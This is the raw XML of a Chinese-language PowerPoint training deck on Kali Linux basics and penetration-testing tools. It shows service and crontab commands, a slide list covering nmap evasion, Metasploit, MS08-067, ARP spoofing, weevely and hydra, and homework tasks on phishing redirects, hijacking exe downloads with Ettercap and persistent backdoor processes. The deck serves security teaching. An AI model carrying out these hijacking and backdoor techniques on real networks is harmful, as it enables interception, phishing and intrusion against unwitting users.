                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>号与每周一到周三的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>点重启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endParaRPr lang="en-US" altLang="zh-CN" sz="16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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0 4 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>jan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> * /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc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rc.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lighttpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> restart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22204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课后题目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63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36441" y="2150621"/>
            <a:ext cx="6096000" cy="2228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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>使用工具，使被攻击机器访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>baidu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>后跳转到自己钓鱼网页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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>局域网劫持，配合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>xplico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>分析流量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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ettercap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>下载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>定时保持后门进程常在，守护进程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136191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36240" y="2496383"/>
            <a:ext cx="5940872" cy="860592"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>谢谢！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="圆角矩形标注 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B5B5E85-AFF3-42CF-A9D1-16474336B4AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7201662" y="1443659"/>
            <a:ext cx="2624329" cy="951260"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 40248"/>
              <a:gd name="adj2" fmla="val 78959"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CED6762B-6787-4B0A-B66C-2C6237EE4E4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7503578" y="1715813"/>
            <a:ext cx="2020496" cy="406953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600" b="1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  <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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Kali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服务启动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48754" y="1425890"/>
            <a:ext cx="784887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 err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:~# service apache2 start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/www/html   www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>目录   可用来下载等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看所有服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> list-units --type=service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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54" y="2891273"/>
            <a:ext cx="7638950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8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Python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创建简单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web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服务器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4514" y="1878997"/>
            <a:ext cx="3010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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>创建简单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>服务器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14" y="2607779"/>
            <a:ext cx="6998815" cy="15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Linux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挂载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windows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共享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>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>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6153" y="1449333"/>
            <a:ext cx="6096000" cy="167449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mount -t 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cifs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 -o username=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hyl,password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=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xxxxx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.. //192.168.8.210/program /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mnt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/program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也可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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hfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>网络服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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491" y="3315054"/>
            <a:ext cx="5590476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THEME" val="e7fe2a87-e5a9-4c95-9d71-f5f43ab607c9"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="主题5">
  <a:themeElements>
    <a:clrScheme name="联想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A3D52"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="C4AF99"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="5B6C83"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="D7CCB8"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="38526E"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="BFBFBF"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="2A3D52"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="BFBFBF"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="c3g3ho1q">
      <a:majorFont>
        <a:latin typeface="Open Sans"/>
        <a:ea typeface="Open Sans"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Open Sans"/>
        <a:ea typeface="Open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联想">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="778495"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="F0F0F0"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="2A3D52"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="C4AF99"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="5B6C83"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="D7CCB8"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="38526E"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="BFBFBF"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2A3D52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联想">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="778495"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="F0F0F0"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="2A3D52"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="C4AF99"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="5B6C83"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="D7CCB8"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="38526E"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="BFBFBF"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2A3D52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联想">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="778495"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="F0F0F0"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="2A3D52"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="C4AF99"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="5B6C83"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="D7CCB8"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="38526E"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="BFBFBF"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2A3D52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联想">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="778495"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="F0F0F0"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="2A3D52"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="C4AF99"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="5B6C83"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="D7CCB8"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="38526E"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="BFBFBF"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2A3D52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联想">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="778495"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="F0F0F0"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="2A3D52"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="C4AF99"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="5B6C83"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="D7CCB8"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="38526E"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="BFBFBF"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2A3D52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联想">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="778495"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="F0F0F0"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="2A3D52"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="C4AF99"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="5B6C83"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="D7CCB8"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="38526E"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="BFBFBF"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2A3D52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297</TotalTime>
  <Words>4923</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>595</Paragraphs>
  <Slides>64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6" baseType="lpstr">
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>华文新魏</vt:lpstr>
      <vt:lpstr>Source Code Pro</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Open Sans Semibold</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Open Sans Extrabold</vt:lpstr>
      <vt:lpstr>Andalus</vt:lpstr>
      <vt:lpstr>主题5</vt:lpstr>
      <vt:lpstr>Kali基础与网络讲解</vt:lpstr>
      <vt:lpstr>    训练环境</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Kali基础配置 </vt:lpstr>
      <vt:lpstr>设置更新源及网卡</vt:lpstr>
      <vt:lpstr>设置ssh服务</vt:lpstr>
      <vt:lpstr>Kali 服务启动</vt:lpstr>
      <vt:lpstr>Python创建简单web服务器</vt:lpstr>
      <vt:lpstr>Linux挂载windows共享</vt:lpstr>
      <vt:lpstr>scp</vt:lpstr>
      <vt:lpstr>代理服务器安装</vt:lpstr>
      <vt:lpstr>Socks5服务器搭建</vt:lpstr>
      <vt:lpstr>Kali web环境创建</vt:lpstr>
      <vt:lpstr>信息收集 </vt:lpstr>
      <vt:lpstr>Kali netcat使用</vt:lpstr>
      <vt:lpstr>dns枚举服务</vt:lpstr>
      <vt:lpstr>snmp枚举服务</vt:lpstr>
      <vt:lpstr>路由跟踪工具</vt:lpstr>
      <vt:lpstr>网络探测</vt:lpstr>
      <vt:lpstr>Smb扫描</vt:lpstr>
      <vt:lpstr>二层探索</vt:lpstr>
      <vt:lpstr>端口扫描masscan</vt:lpstr>
      <vt:lpstr>nmap</vt:lpstr>
      <vt:lpstr>nmap 常用</vt:lpstr>
      <vt:lpstr>Nmap 躲避</vt:lpstr>
      <vt:lpstr>Nmap配合msf自动攻击</vt:lpstr>
      <vt:lpstr>nmap调用nse脚本</vt:lpstr>
      <vt:lpstr>nmap 实例</vt:lpstr>
      <vt:lpstr>nmap 技巧</vt:lpstr>
      <vt:lpstr>Nmap自动化</vt:lpstr>
      <vt:lpstr>服务枚举</vt:lpstr>
      <vt:lpstr>Metasploit sql</vt:lpstr>
      <vt:lpstr>Metasploit mysql</vt:lpstr>
      <vt:lpstr>Metasploit ssh信息</vt:lpstr>
      <vt:lpstr>metasploit 扫描</vt:lpstr>
      <vt:lpstr>Metasploit 探测主机端口</vt:lpstr>
      <vt:lpstr>metasploit 收集信息</vt:lpstr>
      <vt:lpstr>metasploit 自动攻击</vt:lpstr>
      <vt:lpstr>Ms08_067实例</vt:lpstr>
      <vt:lpstr>弱点测试 </vt:lpstr>
      <vt:lpstr>linux arp欺骗</vt:lpstr>
      <vt:lpstr>ettercap</vt:lpstr>
      <vt:lpstr>Ettercap 选项</vt:lpstr>
      <vt:lpstr>arp中间人欺骗</vt:lpstr>
      <vt:lpstr>Ettercap filter</vt:lpstr>
      <vt:lpstr>Dsniff</vt:lpstr>
      <vt:lpstr>tcpdump</vt:lpstr>
      <vt:lpstr>tcpdump正则实例</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>Wireshark分析实例</vt:lpstr>
      <vt:lpstr>Pacp分析工具</vt:lpstr>
      <vt:lpstr>weevely用法</vt:lpstr>
      <vt:lpstr>Weevely技巧</vt:lpstr>
      <vt:lpstr>密码爆破hydra</vt:lpstr>
      <vt:lpstr>密码爆破medusa</vt:lpstr>
      <vt:lpstr>Windows基础命令</vt:lpstr>
      <vt:lpstr>LINUX网络 SECTION HEADER HERE</vt:lpstr>
      <vt:lpstr>Linux路由基础</vt:lpstr>
      <vt:lpstr>路由和防火墙</vt:lpstr>
      <vt:lpstr>Linux常用命令</vt:lpstr>
      <vt:lpstr>linux crontab</vt:lpstr>
      <vt:lpstr>Crontab 实例</vt:lpstr>
      <vt:lpstr>课后题目</vt:lpstr>
      <vt:lpstr>谢谢！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Administrator</cp:lastModifiedBy>
  <cp:revision>55</cp:revision>
  <cp:lastPrinted>2017-08-08T16:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-08T16:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-22T02:37:13Z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e7fe2a87-e5a9-4c95-9d71-f5f43ab607c9</vt:lpwstr>
  </property>
</Properties>
</file>